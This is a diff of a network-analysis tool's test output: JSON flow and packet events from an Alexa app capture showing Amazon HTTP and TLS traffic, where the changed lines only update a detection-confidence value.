-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139642,"flow_last_seen":1490976139669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71nqwmwmRlL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139642,"flow_last_seen":1490976139669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71nqwmwmRlL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2283,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxrjsd\/DnToeVaAScSDohQAAAgQFtAQCCAps+naYAPZ02wEDAwg="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxtRO\/n\/M6S6+6AScSAtRgAAAgQFtAQCCAps+ncBAPZ02wEDAwg="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxlSuJ7038mtw6AScSDlMAAAAgQFtAQCCAps+nm5APZ02wEDAwg="} @@ -715,89 +715,89 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2288,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0ziJAAEAGIi2sECrYNFQ\/OMsbAFAzpLr7UTv6AIAQAVfL2AAAAQEICgD2dN9s+ncB"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2289,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA02RpAAEAGFzWsECrYNFQ\/OMsZAFDfya3DUrie9YAQAVeDwwAAAQEICgD2dN9s+nm5"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2290,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139678,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0c61AAEAGfKKsECrYNFQ\/OMscAFApFQd4fxQzdYAQAVcjzwAAAQEICgD2dN9s+nXP"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2291,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/315y9IEXZSL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2292,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/5100jxqrQhL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2293,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61SZU-lPFNL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81Ni5COup-L._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2291,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/315y9IEXZSL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2292,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/5100jxqrQhL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2293,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61SZU-lPFNL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81Ni5COup-L._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2295,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1490976139711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139711,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyx1XQZuRlNdGa6AScSCQFAAAAgQFtAQCCAps+n\/1APZ03AEDAwg="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2296,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":3,"flow_last_seen":1490976139713,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139713,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0MrdAAEAGvZisECrYNFQ\/OMsdAFCU10ZrV0GbkoAQAVcupAAAAQEICgD2dONs+n\/1"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139714,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139714,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61Tfp7ZVcoL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139714,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139714,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61Tfp7ZVcoL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976142629,"flow_last_seen":1490976142629,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976142629,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1490976142629,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976142629,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Si5AAEAGxLmsECrYNu8d\/Z+uAbuBOjwrAAAAAKAC\/\/9GYAAAAgQFtAQCCAoA9nYFAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1490976142691,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976142691,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0iJAAOcGldA27x39rBAq2AG7n66gUyr3gTo8LHASH\/4OHAAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2482,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":3,"flow_last_seen":1490976142696,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976142696,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoSi9AAEAGxMysECrYNu8d\/Z+uAbuBOjwsoFMq+FAQAVdYjQAA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2483,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976142629,"flow_last_seen":1490976142698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976142698,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2484,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976142629,"flow_last_seen":1490976142816,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976142816,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2483,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976142629,"flow_last_seen":1490976142698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976142698,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2484,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976142629,"flow_last_seen":1490976142816,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976142816,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2506,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976150029,"flow_last_seen":1490976150029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976150029,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2506,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1490976150029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976150029,"pkt":"AMDKkaPvePiC0\/vCCABFAAA86ydAAEAGW8esECrYNF7ohrK2AbvOUJPOAAAAAKAC\/\/\/DwQAAAgQFtAQCCAoA9njpAAAAAAEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2507,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1490976150125,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976150125,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwoZ9AAOcG\/lo0XuiGrBAq2AG7sra0EJrCzlCTz3ASH\/4K2QAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2508,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":3,"flow_last_seen":1490976150126,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976150126,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo6yhAAEAGW9qsECrYNF7ohrK2AbvOUJPPtBCaw1AQAVdVSgAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2509,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976150029,"flow_last_seen":1490976150127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976150127,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 